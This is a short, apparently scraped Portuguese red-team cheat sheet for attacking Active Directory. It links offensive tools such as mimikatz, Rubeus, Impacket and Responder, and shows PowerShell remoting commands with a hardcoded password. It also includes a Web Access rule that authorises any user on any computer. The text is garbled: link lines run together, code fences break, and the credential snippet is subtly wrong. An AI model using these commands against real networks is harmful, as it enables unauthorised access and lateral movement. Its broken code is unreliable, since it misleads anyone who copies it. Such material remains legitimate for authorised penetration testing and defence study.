
Red Team Cheatsheet em constante expansão.

Você pode me apoiar aqui 🐱 :
Esta Folha de Dicas de ataques a AD, feita por RistBS, é inspirada no repositório Active-Directory-Exploitation-Cheat-Sheet.
Ferramentas do PowerShell :
[⭐] Nishang -> https://github.com/samratashok/nishangNishang tem vários scripts úteis para pentesting em Windows no ambiente PowerShell.
PowerView é um script do PowerSploit que permite a enumeração da arquitetura AD para um potencial movimento lateral.
Ferramentas de Enumeração :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeKit de Exploração AD :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoFerramentas de Dump :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/RubeusFerramenta de Listener :
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### Abusando do PSWA
permite que qualquer pessoa com credenciais se conecte a qualquer máquina e qualquer configuração
**[ ! ] esta ação requer credenciais.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *